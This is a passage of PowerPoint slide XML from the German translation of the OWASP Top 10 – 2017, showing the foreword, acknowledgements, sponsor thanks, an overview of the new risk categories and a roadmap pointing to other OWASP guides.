                        <a:rPr lang="de-DE" sz="1000" u="sng" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="1270" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Die OWASP Top 10 und deren Übersetzungen finden Sie unter:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buSzPct val="100000"/>
                        <a:buChar char="•"/>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="1270" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Zuletzt möchten wir uns bei den Initiatoren des OWASP Top 10 Projekts, Dave Wichers und Jeff Williams bedanken für alle ihr Bemühen, für ihr Vertrauen in uns und drauf das Projekt mit Hilfe der OWASP-Community zu einem guten Abschluss zu bringen. Vielen Dank! </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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</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Brian </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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Neil </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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577">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de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Projekt Sponsoren</a:t>
                      </a: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890284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1065600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:b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br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Unser Dank geht an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Autodesk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> für ihre finanzielle Unterstützung zur Erstellung der OWASP Top 10 - 2017.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Firmen und Personen, die Informationen zum Vorkommen von Schwachstellen beigesteuert haben oder die das Projekt auf andere Art und Weise unterstützt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>haben, sind auf der Seite ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1">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Danksagung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>‘ erwähnt.</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525440266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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V</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vorwort</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675773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2689814882"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6854400" cy="8967729"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3373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1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Herzlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Willkommen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>zu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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30289">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Diese große Überarbeitung bringt mehrere neue Themen, darunter zwei von der OWASP-Community ausgewählte Aspekte</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Unsichere Deserialisierung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Unzureichendes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> &amp; Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Zwei wesentliche Unterschiede zu früheren OWASP Top 10-Ausgaben sind das starke Feedback durch die Community und eine umfangreiche Datenerhebung durch dutzende von Organisationen, vermutlich die größte die je für die Vorbereitung von Best-Practices für Anwendungssicherheit erhoben wurde. Dies gibt uns das Vertrauen, dass die neuen OWASP Top10 die Sicherheitsrisiken in Anwendungen mit den größten Auswirkungen für Organisationen adressiert.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In erster Linie basiert OWASP Top 10 – 2017 auf über 40 Datenzulieferungen von auf Anwendungssicherheit spezialisierten Firmen und auf einer Befragung von über 500 Sicherheitsexperten. Die Datenzulieferung umfasst die Schwachstellen von hunderten von Firmen mit insgesamt über 100.000 existierenden Anwendungen und APIs. Die Top 10 Rangliste ergibt sich aus den Verbreitungsdaten in Verbindung mit abgestimmten Abschätzungen zu Ausnutzbarkeit, Nachweisbarkeit und Auswirkungen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es ist ein wesentliches Ziel der OWASP Top 10, Entwickler, Designer, Architekten und Führungskräfte von Organisationen und Unternehmen über die Risiken der wichtigsten Schwachstellen von Webanwendungen aufzuklären. Die Top 10 stellen grundlegende Techniken zum Schutz gegen diese hochriskanten Probleme vor. Sie zeigen auch auf, wie es danach weitergeht.</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36174828"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4001655"/>
          <a:ext cx="3352800" cy="5910200"/>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37106">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Roadmap für weitere Aktivitäten</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5567239">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de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hören Sie nicht bei 10 auf!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Es gibt hunderte von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Proble</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>men</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, die Auswirkungen auf die Gesamtsicherheit einer Webanwendung haben wie im </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Developer's</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und in der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> dargestellt. Diese sollten von jedem Entwickler von Webanwendungen und APIs gelesen werden. Ein Leitfaden zum effizienten Finden von Schwachstellen in Webanwendungen uns APIs liefert der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Testing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
